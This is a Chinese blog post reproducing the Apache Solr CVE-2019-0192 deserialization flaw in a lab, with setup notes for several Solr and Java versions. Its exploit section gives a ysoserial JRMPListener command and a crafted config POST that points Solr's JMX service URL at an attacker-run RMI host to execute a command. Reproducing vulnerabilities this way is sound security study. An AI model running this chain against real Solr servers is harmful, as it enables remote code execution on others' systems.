solr(CVE-2019-0192)

最新推荐文章于 2024-05-31 09:52:47 发布
最新推荐文章于 2024-05-31 09:52:47 发布
阅读量1.9k 收藏 1
点赞数
分类专栏: java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/caiqiiqi/article/details/88431504
版权

影响版本是5.0.0 to 5.5.5 and 6.0.0 to 6.6.5

但是实际由于6.x的需要Java8在这里插入图片描述才能利用,所以这里只用5.x的进行演示。
最后用solr-5.3.0 + jdk1.7.0_21 完成了。
在这里插入图片描述

PoC:
https://github.com/mpgn/CVE-2019-0192/

solr-6.6.5

http://120.52.51.16/archive.apache.org/dist/lucene/solr/6.6.5/solr-6.6.5.zip
运行的最低Java版本是8:

cqq@ubuntu:~/repos/cms/solr-6.6.5$ bin/solr -e techproducts -D com.sun.management.jmxremote
Your current version of Java is too old to run this version of Solr
We found version 1.7.0_21, using command 'java -version', with response:
java version "1.7.0_21"
Java(TM) SE Runtime Environment (build 1.7.0_21-b11)
Java HotSpot(TM) 64-Bit Server VM (build 23.21-b01, mixed mode)

Please install latest version of Java 1.8 or set JAVA_HOME properly.

Debug information:
JAVA_HOME: N/A
Active Path:
/home/cqq/bin:/home/cqq/.local/bin:/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/go/bin:/home/cqq/go/bin:/home/cqq/go/bin

可以在运行Solr的shell引入环境变量:

export SOLR_JAVA_HOME=/home/77/repos/jdk1.8.0_112

或者Windows下:

set PATH="C:\Program Files\Java\jdk1.7.0_21\bin";%PATH%

然后启动即可:
Windows下

.\solr.cmd -e techproducts

这个-Dcom.sun.management.jmxremote并不是必须的。
在这里插入图片描述
停止:

bin\solr.cmd stop -p 8983

再次启动之前需要将之前的example\techproducts目录删掉。

solr-6.2.1

http://120.52.51.16/archive.apache.org/dist/lucene/solr/6.2.1/solr-6.2.1.zip
虽然没强制说Java 7不能运行,但是报错Unsupported major.minor version 52.0,查了stackoverflow,也说是java版本问题:

cqq@ubuntu:~/repos/cms/solr-6.2.1$ bin/solr -e techproducts -Dcom.sun.management.jmxremote
Exception in thread "main" java.lang.UnsupportedClassVersionError: org/apache/solr/util/SolrCLI : Unsupported major.minor version 52.0
	at java.lang.ClassLoader.defineClass1(Native Method)
	at java.lang.ClassLoader.defineClass(ClassLoader.java:791)
	at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142)
	at java.net.URLClassLoader.defineClass(URLClassLoader.java:449)
	at java.net.URLClassLoader.access$100(URLClassLoader.java:71)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:361)
	at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
	at java.security.AccessController.doPrivileged(Native Method)
	at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:423)
	at sun.misc.Launcher$AppClassLoader.loadClass(Launcher.java:308)
	at java.lang.ClassLoader.loadClass(ClassLoader.java:356)
	at sun.launcher.LauncherHelper.checkAndLoadMain(LauncherHelper.java:482)

算了还是用5.x的solr吧。

5.5.3

按照这个:https://mp.weixin.qq.com/s/ZtqM2EhB2BbZmDt1omvF6A
用5.5.3版本
https://archive.apache.org/dist/lucene/solr/5.5.3/solr-5.5.3.zip
先启动起来,
注意这里启动solr的方式中,solr这个脚本是根据环境中的java命令来判断Java版本的。比如/usr/bin/java,我这边是修改了这个java所指向的java版本来修改solr启动java版本的。

cqq@ubuntu:~/repos/cms/solr-5.5.3/bin$ ./solr -h 192.168.170.217 -e techproducts
Solr home directory /home/cqq/repos/cms/solr-5.5.3/example/techproducts/solr already exists.

Starting up Solr on port 8983 using command:
/home/cqq/repos/cms/solr-5.5.3/bin/solr start -p 8983 -s "/home/cqq/repos/cms/solr-5.5.3/example/techproducts/solr" -h 192.168.170.217

Waiting up to 30 seconds to see Solr running on port 8983 [/]
Started Solr server on port 8983 (pid=18463). Happy searching!


WARNING: Core 'techproducts' already exists!
Checked core existence using Core API command:
http://192.168.170.217:8983/solr/admin/cores?action=STATUS&core=techproducts


Solr techproducts example launched successfully. Direct your Web browser to http://192.168.170.217:8983/solr to visit the Solr Admin UI

要加上-Dcom.sun.management.jmxremote参数

否则会启动失败:
java.lang.RuntimeException:java.lang.RuntimeException: Could not start JMX monitoring
在这里插入图片描述
再使用PoC执行
需要等待大概一分钟,才能完成执行的过程:(这个PoC有点长,感觉其实没必要吧)
在这里插入图片描述
在这里插入图片描述
执行命令:

java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/test_by_cqq"

即在1099端口监听,然后发送以下请求:
在发送之前,需要确保
GET /solr/admin/cores?wt=json
的请求返回的响应json中的status字段的值第一个为:techproducts,
在这里插入图片描述
然后下面这个请求是根据前一个请求的结果来确定的。

POST /solr/techproducts/config HTTP/1.1
Host: 192.168.170.217:8983
User-Agent: python-requests/2.21.0
Connection: keep-alive
Content-Type: application/json
Content-Length: 92

{"set-property": {"jmx.serviceUrl": "service:jmx:rmi:///jndi/rmi://192.168.170.1:1099/obj"}}

即可触发。
下图说明命令已成功执行:
在这里插入图片描述
如果出现以下错误:

java.io.InvalidObjectException: Non-annotation type in annotation serial stream

则说明是Java版本高了,无法利用。
是说怎么JDK某个版本以上就不行了,因为有JEP 290这个特性

参考:
https://blog.csdn.net/u011721501/article/details/78555246

多个solr共存的漏洞环境搭建

启动哪个core

一般作为漏洞环境,启动solr就用自带的example吧,懒得自己创建一个core了

  -e <example>  Name of the example to run; available examples:
      cloud:         SolrCloud example
      techproducts:  Comprehensive example illustrating many of Solr's core capabilities
      dih:           Data Import Handler
      schemaless:    Schema-less example

第一个是cloud模式,第二个包含了很多solr的core的功能,一般用这个吧;第三个用的DataImportHandler。

启动的端口号
  -p <port>     Specify the port to start the Solr HTTP listener on; default is 8983
                  The specified port (SOLR_PORT) will also be used to determine the stop port
                  STOP_PORT=($SOLR_PORT-1000) and JMX RMI listen port RMI_PORT=($SOLR_PORT+10000). 
                  For instance, if you set -p 8985, then the STOP_PORT=7985 and RMI_PORT=18985

默认是8983,然后其他两个端口号相应地改变,停止端口号:8983-1000=7983;
JMX监听端口号8983+10000=18983.

caiqiiqi
关注
专栏目录
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558)
qq_51577576的博客
12-09 603
[ vulhub漏洞复现篇 ] solr 远程命令执行 (CVE-2019-17558) Apache Velocity是一个基于Java的模板引擎,它提供了一个模板语言去引用由Java代码定义的对象。Velocity是Apache基金会旗下的一个开源软件项目,旨在确保Web应用程序在表示层和业务逻辑层之间的隔离。 Apache Solr 5.0.0版本至8.3.1版本中存在输入验证错误漏洞。攻击者可借助自定义的Velocity模板功能,利用Velocity-SSTI漏洞在Solr系统上执行任意代码。
apache solr 任意问题件读取 CVE-2019-17558
失心少年
11-03 314
olr中存在VelocityResponseWriter组件,攻击者可以构造特定请求修改相关配置,使VelocityResponseWriter组件允许加载指定模板,进而导致Velocity模版注入远程命令执行漏洞,攻击者利用该漏洞可以直接获取到服务器权限。
Apache Solr RCE复现(CVE-2019-0192
whojoe的博客
07-22 1499
Apache Solr RCE复现(CVE-2019-0192)前言环境搭建漏洞复现参考文章 前言 影响版本 5.0.0至5.5.5 6.0.0至6.6.5 环境搭建 下载ysoserial https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar 启动docker systemctl start docker 下载环境 docker pull solr:6.1 启动环境
cve-2019-0192一把梭
Yale的博客
03-26 5267
背景: 近日,Apache Solr官方团队在最新的安全更新中披露了一则Apache Solr Deserialization 远程代码执行漏洞(CVE-2019-0192)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是ConfigAPI允许通过HTTP POST请求配置SolrJMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发...
前端系列课程之axios应用(一)
qiuqiudongdong的博客
10-15 321
axios应用: 目标: 掌握axios的安装和引用 掌握axios服务器的请求方法 掌握axios拦截器的设置 掌握axios实战应用 Axios概述: axios是一个第三方库,支持前后端发起的http请求 官网 http://www.axios-js.com/ 安装 npm install axios –S axios引用方法: 全局引用 组件引用 在组件的script中导入axios axios的服务器请求
CVE-2019-0192 Apache Solr远程反序列化代码执行漏洞
yyj1781572的博客
04-05 659
Apache Solr是一个开源的搜索服务器。具有高度可靠、可伸缩和容错的,提供分布式索引、复制和负载平衡查询、自动故障转移和恢复、集中配置等功能。
rmi远程代码执行漏洞_漏洞预警 | Apache Solr Deserialization远程代码执行漏洞(CVE20190192)...
weixin_39849548的博客
01-05 183
近日,Apache Solr官方团队在最新的安全更新中披露了一则Apache Solr Deserialization 远程代码执行漏洞(CVE-2019-0192)。漏洞官方定级为 High,属于高危漏洞。漏洞原因是ConfigAPI允许通过HTTP POST请求配置SolrJMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发...
solr_exploit:Apache Solr远程代码执行突破(CVE-2019-0193)漏洞利用
03-10
构造URLDataSource类型的数据源(Solr服务器会去访问该数据源!)可以直接使用这个 文档demo.xml即URLDataSource类型的数据源一份无害的正常XML文档 文档中只有一个item元素骑士实现只执行1次命令 也可以自己启动...
CVE-2019-0193 Apache-Solr via Velocity template RCE.MD
04-12
CVE-2019-0193 Apache-Solr via Velocity template RCE
apache solr rce cve-2019-0192 分析
whatday的专栏
06-26 521
前言 漏洞详情:https://issues.apache.org/jira/browse/SOLR-13301 漏洞POC:https://github.com/mpgn/CVE-2019-0192 影响版本:5.0.0 ~ 5.5.5、6.0.0 ~ 6.6.5 安全版本:7.0 简要描述 ConfigAPI allows to configure Solr's JMX server via an HTTP POST request.By pointing it to a malicious
rmi远程代码执行漏洞_【漏洞预警】Apache Solr Deserialization 远程代码执行漏洞(CVE20190192)...
weixin_39600328的博客
01-05 199
近日,Apache Solr官方团队在最新的安全更新中披露了一则Apache Solr Deserialization 远程代码执行漏洞(CVE-2019-0192)。漏洞官方定级为 High,属于高危漏洞。该漏洞本质是ConfigAPI允许通过HTTP POST请求配置SolrJMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触...
CVE-2019-0192 Apache solr远程反序列化代码执行漏洞危害
永远是少年
06-08 427
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-0192 Apache solr远程反序列化代码执行漏洞详解。 一、Apache solr简介 二、CVE-2019-0192 Apache solr远程反序列化代码执行漏洞分析 三、漏洞修复......
探索安全边界:Apache Solr RCE漏洞CVE-2019-0192的PoC与应用
最新发布
gitblog_00051的博客
05-31 272
探索安全边界:Apache Solr RCE漏洞CVE-2019-0192的PoC与应用 项目地址:https://gitcode.com/mpgn/CVE-2019-0192 在网络安全领域,发现并利用漏洞是一种重要的学习和防御手段。今天,我们将深入探讨一个针对Apache Solr的远程代码执行(RCE)漏洞——CVE-2019-0192。这个开源项目提供了一个早期的概念验证(Proof of...
CVE-2019-019
weixin_38477805的博客
03-29 423
近日根据网上得教程复现了CVE-2019-0192这个漏洞 1.漏洞说明 描述:Apache Solr中的ConfigAPI允许设置一个jmx.serviceUrl,它将创建一个新的JMXConnectorServerFactory,并通过“绑定”操作触发对目标RMI/LDAP服务器的调用。恶意的RMI服务器可以响应任意的对象,这些对象将在Solr端使用java的ObjectInputStream...
Kafka开启JMX
热门推荐
紫蝶侠的博客
06-09 1万+
通过JMX自定义监控 通过JMX监控可以看到的数据有: broker数据指标 topic数据指标 每个partition的数据指标 consumer消费滞后情况等。 1、jconsole 在使用jmx之前需要确保kafka开启了jmx监控,kafka启动时要添加JMX_PORT=9999这一项 通过JMX_PORT 指定连接jmx的端口号 JMX_PORT=9999 bin/kafka-ser...
启动Solr提示Java版本低,无法启动的解决办法
bill800208的博客
10-09 500
启动Solr服务提示Java版本低无法启动,但是已经安装了Java1.8,环境变量也修改了解决办法:打开Runsolr.bat发现Java_HOME已经写死将高版本的JDK路径填入即可运行...
已解决java.lang.RuntimeException: 运行时异常的正确解决方法,亲测有效!!!
小明的Java问道之路
04-05 9518
已解决java.lang.RuntimeException: 运行时异常的正确解决方法,亲测有效!!!
zeppelin监控:Prometheus MonitoringJMX Monitoring
zhengzaifeidelushang的博客
07-28 458
zeppelin监控:Prometheus MonitoringJMX Monitoring一、Prometheus Monitoring二、浏览器查看Prometheus Monitoring输出的zeppelin监控指标三、JMX Monitoring四、安装JMX导出器 官方文档地址: https://zeppelin.apache.org/docs/0.9.0/setup/operation/monitoring.html zeppelin监控有两种实现方式: 方式一:Prometheus Mo
cve-2019-6520编写poc
05-25
CVE-2019-6520是一个Apache Solr中的任意文件读取漏洞。攻击者可以利用该漏洞读取服务器上的任意文件。 下面是一个简单的Python脚本,可以利用该漏洞读取指定文件: ```python import requests url = ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值